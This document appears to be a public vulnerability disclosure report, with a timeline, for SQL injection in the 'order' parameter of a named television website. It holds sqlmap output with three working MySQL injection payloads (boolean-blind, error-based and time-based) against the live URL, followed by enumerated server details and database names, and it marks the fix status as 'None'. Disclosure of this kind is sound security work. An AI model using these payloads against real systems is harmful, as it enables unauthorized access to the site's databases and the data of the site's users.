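2015-08-20: Details reported to the vendor; awaiting vendor handling
2015-08-21: Vendor confirmed; details disclosed to the vendor only
2015-08-31: Details disclosed to core white hats and experts in related fields
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to intern white hats
2015-10-05: Details disclosed to the public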
RT
http://www.hktv.tv/e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60
Parameter: order
Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: classid=88&id=347&num=5&order=1 RLIKE (SELECT (CASE WHEN (5751=5751) THEN 1 ELSE 0x28 END))&sub=60

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: classid=88&id=347&num=5&order=1 AND (SELECT 2695 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(2695=2695,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sub=60

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: classid=88&id=347&num=5&order=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FfrU)&sub=60
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
current user: '[email protected]:52156'
current user is DBA: False
available databases [24]
Database: cms_hktv [238 tables]
~
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-08-21 10:14
Fixed
None